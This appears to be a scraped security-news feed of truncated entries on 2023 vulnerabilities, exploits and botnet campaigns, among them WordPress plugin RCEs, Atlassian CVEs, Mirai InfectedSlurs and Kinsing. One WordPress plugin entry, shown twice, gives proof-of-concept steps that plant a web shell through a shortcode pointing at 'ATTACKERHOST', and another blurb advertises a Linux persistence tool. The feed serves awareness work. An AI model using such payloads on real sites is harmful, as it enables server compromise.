DynastyPersist - A Linux Persistence Tool!

A Linux persistence tool! A powerful and versatile Linux persistence script designed for various security assessment and testing scenarios. This script provides a collection of features that demonstrate different methods of achieving persistence on a Linux system. Features 1. SSH Key Generation:...

WordPress Royal Elementor Addons Remote Code Execution Exploit

Exploit for the unauthenticated file upload vulnerability in WordPress Royal Elementor Addons and Templates plugin 'WordPress Royal Elementor Addons RCE', 'Description' = %q Exploit for the unauthenticated file upload vulnerability in WordPress Royal Elementor Addons and Templates plugin...

CVE-2023-39542

CVE-2023-39542 describes a code execution vulnerability in the Javascript saveAs API of Foxit Reader 12.1.3.15356. A specially crafted malformed file can create arbitrary files, potentially leading to remote code execution. An attacker must trick the user into opening the malicious file, and expl...

Mirai Botnet’s Offspring InfectedSlurs Exploits Dual Zero-Days

Summary: A new Mirai-based malware botnet, InfectedSlurs, is actively conducting a sophisticated campaign by exploiting two zero-day remote code execution RCE vulnerabilities in routers and video recorder NVR devices. These vulnerabilities, currently being exploited in the wild, facilitate the...

Exploit for CVE-2023-38646

CVE-2023-38646 Metabase Pre-Auth RCE 11/26/2023 Metabase ope...

Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE

Description The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. 1. Host a webserver with a shell named webshell.zip.php 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...

Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE

Description The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. PoC 1. Host a webserver with a shell named webshell.zip.php 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...

Mirai-based Botnet Exploiting Zero-Day Bugs in Routers and NVRs for Massive DDoS Attacks

An active malware campaign is leveraging two zero-day vulnerabilities with remote code execution RCE functionality to rope routers and video recorders into a Mirai-based distributed denial-of-service DDoS botnet. "The payload targets routers and network video recorder NVR devices with default adm...

Nexter Extension < 2.0.4 - Authenticated(Editor+) Remote Code Execution via metabox

Description The Nexter Extension plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 2.0.3 via the nxt-code-php-snippet metabox. This allows authenticated attackers with editor-level privileges and above to execute code on the server...

Synology Router Manager (SRM) 1.2.x < 1.2.5-8227-11, 1.3.x < 1.3.1-9346-8 Multiple Vulnerabilities (Synology-SA-23:16) - Remote Known Vulnerable Versions Check

Synology Router Manager SRM is prone to multiple vulnerabilities. SPDX-FileCopyrightText: 2023 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE =...

Remote code execution

The News & Blog Designer Pack – WordPress Blog Plugin — Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post Ticker, Blog Post Masonry plugin for WordPress is vulnerable to Remote Code Execution via Local File Inclusion in all versions up to, and including, 3.4.1 via the bdpgetmorepost...

Denial Of Service (DOS)

libzephyr.so is vulnerable to Denial Of Service DOS. The vulnerability is caused by the leadvertisingreport function in /subsys/bluetooth/controller/hci/hci.c because an advertising packet is not processed properly when copying data. The root cause of the issue are integer overflow while storing ...

Kinsing Malware Utilizes Apache ActiveMQ RCE to Deploy Rootkits

Summary: The Kinsing malware operator is actively taking advantage of the critical vulnerability CVE-2023-46604 in Apache ActiveMQ, an open-source message broker. The vulnerability allows remote code execution, facilitating deployment of Kinsing malware aka h2miner, which functions as a...

CVE-2023-48699 fastbots Eval Injection vulnerability

fastbots is a library for fast bot and scraper development using selenium and the Page Object Model POM design. Prior to version 0.1.5, an attacker could modify the locators.ini locator file with python code that without proper validation it's executed and it could lead to rce. The vulnerability ...

Download to arbitrary folder can lead to RCE

Summary A web UI user can store files anywhere on the pyLoad server and gain command execution by abusing scripts. Details When a user creates a new package, a subdirectory is created within the /downloads folder to store files. This new directory name is derived from the package name, except a...

Eval Injection in fastbots

Impact An attacker could modify the locators.ini locator file with python code that without proper validation it's executed and it could lead to rce. The vulnerability is in the function def locatorself, locatorname: str in page.py. The vulnerable code that load and execute directly from the file...

GHSA-VCCG-F4GP-45X9 Eval Injection in fastbots

Impact An attacker could modify the locators.ini locator file with python code that without proper validation it's executed and it could lead to rce. The vulnerability is in the function def locatorself, locatorname: str in page.py. The vulnerable code that load and execute directly from the file...

CVE-2023-22521

This High severity RCE Remote Code Execution vulnerability was introduced in version 3.4.6 of Crowd Data Center and Server. This RCE Remote Code Execution vulnerability, with a CVSS Score of 8.0, allows an authenticated attacker to execute arbitrary code which has high impact to confidentiality,...

CVE-2023-22516

This High severity RCE Remote Code Execution vulnerability was introduced in versions 8.1.0, 8.2.0, 9.0.0, 9.1.0, 9.2.0, and 9.3.0 of Bamboo Data Center and Server. This RCE Remote Code Execution vulnerability, with a CVSS Score of 8.5, allows an authenticated attacker to execute arbitrary code...

CVE-2023-22516

CVE-2023-22516 affects Atlassian Bamboo Data Center and Server versions 8.1.0 through 9.3.0. It is an authenticated remote code execution vulnerability with a CVSS v3.1 base score of 8.8 (vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) and a CVSS v3.0 score of 8.5 (attack vector NETWORK, privileges ...